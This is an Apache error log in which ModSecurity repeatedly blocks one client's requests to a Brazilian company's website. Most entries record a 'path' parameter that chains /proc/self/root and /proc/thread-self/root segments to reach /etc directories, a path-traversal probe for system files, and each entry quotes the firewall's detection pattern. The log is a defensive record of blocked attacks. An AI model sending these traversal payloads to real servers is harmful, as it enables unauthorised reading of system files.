[Tue Mar 17 14:35:09.616080 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.31:60702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQza4xEDsg_V3ESNZOjQAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:11.079893 2026] [:error] [pid 9299:tid 140411590858496] [client 74.7.241.31:60704] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQz7-sgTmmJoPuMdy4jAAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:13.138976 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:60708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQ0QeiSKl8TjouI-YbvQAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:20.076881 2026] [:error] [pid 18380:tid 140411540502272] [client 74.7.241.31:49374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQ2K4xEDsg_V3ESNZOjgAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:22.033811 2026] [proxy_fcgi:error] [pid 7437:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42830] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:35:24.542979 2026] [:error] [pid 7004:tid 140411590858496] [client 74.7.241.31:49380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQ3MU6Sx0TG1YjmQixTwAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:31.626265 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:49386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQ4xj0p0SRWAqcjGF7wAAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:34.491205 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.241.31:60294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQ5sU6Sx0TG1YjmQixVQAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:36.143583 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.241.31:60306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQ6KBJNF7axNlVR0UaAAAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:43.363795 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.241.31:43278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQ7xj0p0SRWAqcjGF7ywAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:44.121828 2026] [proxy_fcgi:error] [pid 2473:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43428] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:35:47.314360 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.31:43282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQ8weiSKl8TjouI-YbxwAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:51.547419 2026] [:error] [pid 9299:tid 140411574073088] [client 74.7.241.31:59330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQ97-sgTmmJoPuMdy4mQAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:54.384838 2026] [:error] [pid 6296:tid 140411666392832] [client 74.7.241.31:59334] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQ-nIk7brgkOH-rIWN3QAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:35:58.726160 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.241.31:59342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQ_geiSKl8TjouI-YbzgAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:36:00.395856 2026] [:error] [pid 29151:tid 140411624429312] [client 74.7.241.31:56672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRAPPqhzTj3BvfDX-KLQAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:36:05.125797 2026] [proxy_fcgi:error] [pid 2598:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43820] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:36:06.196416 2026] [:error] [pid 17965:tid 140411599251200] [client 74.7.241.31:56688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRBqt8Nd0UC_OcbVHNUgAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:36:19.291565 2026] [:error] [pid 18380:tid 140411666392832] [client 74.7.241.31:49156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmREq4xEDsg_V3ESNZOrAAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:36:22.163577 2026] [:error] [pid 29151:tid 140411557287680] [client 74.7.241.31:41578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRFvPqhzTj3BvfDX-KOAAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:36:25.045583 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:41580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRGXIk7brgkOH-rIWN7AAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:36:26.125781 2026] [proxy_fcgi:error] [pid 17965:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44194] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:36:30.827627 2026] [:error] [pid 17965:tid 140411741927168] [client 74.7.241.31:41588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRHqt8Nd0UC_OcbVHNXQAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:36:47.129821 2026] [proxy_fcgi:error] [pid 17965:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:44586] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:37:00.231540 2026] [:error] [pid 18380:tid 140411699963648] [client 74.7.241.31:38664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRPK4xEDsg_V3ESNZOxwAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:37:03.429642 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.31:48228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRP6BJNF7axNlVR0UaSQAAAAE"], referer: 